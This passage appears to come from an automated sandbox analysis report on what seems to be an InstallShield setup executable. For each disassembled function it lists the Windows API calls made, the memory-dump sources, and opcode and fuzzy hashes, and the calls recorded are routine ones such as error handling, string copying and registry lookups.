                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Last$Exception@8FileH_prolog3_ReadThrow
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2465803405-815662401
                                                                                                                                                                          • Opcode ID: 13a1e467b967cb21f1c486671ebf6ba3d1f59f205f2c1b932172821062709fa5
                                                                                                                                                                          • Instruction ID: 8da10ccdbc95e4ee78ae6e59552e5795d8a60701dd4cb6faeb61a82ca62d743d
                                                                                                                                                                          • Opcode Fuzzy Hash: 13a1e467b967cb21f1c486671ebf6ba3d1f59f205f2c1b932172821062709fa5
                                                                                                                                                                          • Instruction Fuzzy Hash: 782130B5900218DBDB24EFA5CC91EEEB7B8BF44704F10816FF905A7141DB749A49CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004400AA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfW.USER32 ref: 004400D1
                                                                                                                                                                            • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA2E
                                                                                                                                                                            • Part of subcall function 0043F9EA: _wcsrchr.LIBCMT ref: 0043FA39
                                                                                                                                                                            • Part of subcall function 0043F9EA: CharNextW.USER32(00000000), ref: 0043FA47
                                                                                                                                                                            • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA65
                                                                                                                                                                            • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA6E
                                                                                                                                                                            • Part of subcall function 0043F694: lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
                                                                                                                                                                            • Part of subcall function 0043F694: lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
                                                                                                                                                                            • Part of subcall function 0043F694: lstrcatW.KERNEL32(?,?), ref: 0043F6DD
                                                                                                                                                                          • lstrcatW.KERNEL32(?,.ini), ref: 00440103
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 00440112
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$lstrcat$CharNext_wcsrchrlstrcpynlstrlenwsprintf
                                                                                                                                                                          • String ID: %#04x$.ini
                                                                                                                                                                          • API String ID: 3831616985-866680231
                                                                                                                                                                          • Opcode ID: e948ff50f732aa0e6b05b0197cc8289fd38350952c1fd68609128b6a1574d291
                                                                                                                                                                          • Instruction ID: 9c9a483e69db4c729a90b923d3f4109f2775f79c1bad490d6a180dfaf7d5776b
                                                                                                                                                                          • Opcode Fuzzy Hash: e948ff50f732aa0e6b05b0197cc8289fd38350952c1fd68609128b6a1574d291
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A014F71900218BBDB00EFA5DC46DEF77BCEF49714B008066F809A2141DB38EA058BA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041F533, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041F53A
                                                                                                                                                                          • __ltow_s.LIBCMT ref: 0041F572
                                                                                                                                                                          • SetLastError.KERNEL32(00000008,00000000,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F5A1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last__ltow_s
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2344196725-815662401
                                                                                                                                                                          • Opcode ID: c96ca283a4f670909ebf739ba84eae7fa5ee4cd402d2de1e0138b96ece8d58ae
                                                                                                                                                                          • Instruction ID: c31c904021e132e1002971dd78a2b18e37e079d68fe1251bf6cccadc293eb156
                                                                                                                                                                          • Opcode Fuzzy Hash: c96ca283a4f670909ebf739ba84eae7fa5ee4cd402d2de1e0138b96ece8d58ae
                                                                                                                                                                          • Instruction Fuzzy Hash: C401D271800208EBDB20EF90C945DDE7BB5FB44314F54452EF504A7291DB759A45CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00431961, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00431988
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00431998
                                                                                                                                                                            • Part of subcall function 004320F1: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00431978,?,?), ref: 00432103
                                                                                                                                                                            • Part of subcall function 004320F1: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00432113
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                                                                                                                          • API String ID: 1646373207-2191092095
                                                                                                                                                                          • Opcode ID: 326cd7fce92b8924169d81be504bbcb9f55db01732045abf26c2d7b7d83cd487
                                                                                                                                                                          • Instruction ID: dd37f9d3439fbcbe3bf38b2a549841ccfa3b53978471e8722b2116d3f20d5271
                                                                                                                                                                          • Opcode Fuzzy Hash: 326cd7fce92b8924169d81be504bbcb9f55db01732045abf26c2d7b7d83cd487
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01DF74108200FBDB104F50DC24B65BFA2BF1D351F1090ABF44A91271EB669A44DB2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004739E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004739F3
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00473A0F
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473A42
                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00473A72
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3822639702-1835203436
                                                                                                                                                                          • Opcode ID: 283aa6313a280586939511c29e89319b6e0852ad2fbfbbddf52d478e48815072
                                                                                                                                                                          • Instruction ID: 150f6e05978fa2c8ef4af202aa7dc708589bf23497ff85e664190e12c7eada26
                                                                                                                                                                          • Opcode Fuzzy Hash: 283aa6313a280586939511c29e89319b6e0852ad2fbfbbddf52d478e48815072
                                                                                                                                                                          • Instruction Fuzzy Hash: A801E2384041049BDB00AF64ED09B993BA5EF29309B8540FBE809E3272D73B695CCF8C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041C5BD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\InstallShield\ISWI\7.0\SetupExeLog,00000000,00000001,?), ref: 0041C5D7
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,SetupLogFileName,00000000,00000000,0049F668,?), ref: 0041C5FD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041C618
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\InstallShield\ISWI\7.0\SetupExeLog, xrefs: 0041C5CD
                                                                                                                                                                          • SetupLogFileName, xrefs: 0041C5EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: SetupLogFileName$Software\InstallShield\ISWI\7.0\SetupExeLog
                                                                                                                                                                          • API String ID: 3677997916-622478307
                                                                                                                                                                          • Opcode ID: 8039b13624f15f90f3e6bb2e7f2f18806f24899ce577f0137cd97e99211e9298
                                                                                                                                                                          • Instruction ID: 1ec7e8d73d53d4762f271f3a6044bfe54086d2b13b2f9b9fb6d24fbfc8a2aa94
                                                                                                                                                                          • Opcode Fuzzy Hash: 8039b13624f15f90f3e6bb2e7f2f18806f24899ce577f0137cd97e99211e9298
                                                                                                                                                                          • Instruction Fuzzy Hash: CDF089B1240344BBEB20DB51DC4AFDE7EBDDB95B01F104075B605E11A0D6B45A49DA2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00439036, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043903D
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0043ABFF,00000000,00000000,00000001), ref: 00439065
                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 00439098
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: 3896c554a1ee2f42b031abd0cb24c383073f6c7d9b80603c6e8ea63fd4ddf833
                                                                                                                                                                          • Instruction ID: 6af8fd99a4e1ceff93cfd34ef824ee1732dedf47875737897cbbcf0007d128f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 3896c554a1ee2f42b031abd0cb24c383073f6c7d9b80603c6e8ea63fd4ddf833
                                                                                                                                                                          • Instruction Fuzzy Hash: 82019E30404646EFCB01DF54C948B9CBBB1BF00318F14C15EE8185B392C7B9AA54DB44
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415409, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415410
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00415597,?,00000000,00000004,004166A4,?,00000001), ref: 00415438
                                                                                                                                                                          • SetLastError.KERNEL32(?,?), ref: 00415468
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: 25ab85ae9e261cb90a25950f3880020dc9ce1899dbcf4e984f3cf15409ca0484
                                                                                                                                                                          • Instruction ID: 65d6d302b739bc02b84f888956bbc4a812ecd6803861786213f9fddf34d32e0a
                                                                                                                                                                          • Opcode Fuzzy Hash: 25ab85ae9e261cb90a25950f3880020dc9ce1899dbcf4e984f3cf15409ca0484
                                                                                                                                                                          • Instruction Fuzzy Hash: 8201BC30400645EFC710EF55C908BDCBBB1BF00318F14C25EE8185B3A2C7B8AA94DB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415486, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0041548D
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000004), ref: 004154B5
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,?,?,00000004), ref: 004154E5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: e8c102dbb9ac6f906824622144e097b398254eb03e7ebb7e450a51fd1c177a48
                                                                                                                                                                          • Instruction ID: 3d9c79b3ff7dddcb8e9ac08f56a7f312ffb827751539f2896737dc429557cb3e
                                                                                                                                                                          • Opcode Fuzzy Hash: e8c102dbb9ac6f906824622144e097b398254eb03e7ebb7e450a51fd1c177a48
                                                                                                                                                                          • Instruction Fuzzy Hash: 4801BC30400645EFD700EF55C548BDCBBB1BF00318F14C25EE8185B3A2CBB8AA84DB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041BAEB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                          • String ID: /m1$/m2
                                                                                                                                                                          • API String ID: 3213498283-2289526375
                                                                                                                                                                          • Opcode ID: d2e7ebf19c4c3980dcf54e5d90e0c280d8c1be2b096c0c8047adc858205bac6f
                                                                                                                                                                          • Instruction ID: ad0e97c87b4642bb15936ebbb4cc2382faf8d11e6453767fa7e6f77b0ba24e30
                                                                                                                                                                          • Opcode Fuzzy Hash: d2e7ebf19c4c3980dcf54e5d90e0c280d8c1be2b096c0c8047adc858205bac6f
                                                                                                                                                                          • Instruction Fuzzy Hash: B6E02B306DC114B9A6246F288CE58FE3918FA413547A002BB7407A25E1CB5C0EC2EFEF
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004390B6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 004390BD
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0043B7AC,00000001,removeasmajorupgrade,00000000,00000000,00000001,?), ref: 004390E5
                                                                                                                                                                          • SetLastError.KERNEL32(00000008), ref: 0043910E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: 57653936656da7cfbb61492fa6fba3c11f7a0209075d143165ab34e93bbacb31
                                                                                                                                                                          • Instruction ID: 48ace98de89235db829c715544e479cedbebb5dda87c505fae8b47019672f4d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 57653936656da7cfbb61492fa6fba3c11f7a0209075d143165ab34e93bbacb31
                                                                                                                                                                          • Instruction Fuzzy Hash: 69018B70504645EFD700DF54C54879CBBF1BF00319F55C2AEE8085B392C7B9AA84DB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00415D60, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00415D67
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00416264,00000000,00000004,00415E33,00000001,00000004,80070057), ref: 00415D8F
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00415DB8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG$hsG
                                                                                                                                                                          • API String ID: 3502553090-148063137
                                                                                                                                                                          • Opcode ID: 8f3f3ce73e10cb00ed0fc433b4de4d0451186682566f0ccc6f48e49c2e2f1b46
                                                                                                                                                                          • Instruction ID: fdc90de00d6c2517474ca1f187016c383736ae76038672babb381d6b48f87e7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f3f3ce73e10cb00ed0fc433b4de4d0451186682566f0ccc6f48e49c2e2f1b46
                                                                                                                                                                          • Instruction Fuzzy Hash: 60018B70504641EFD700DF54C50879CBBF1BF00319F55C26EE8085B392C7B9AA84DB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

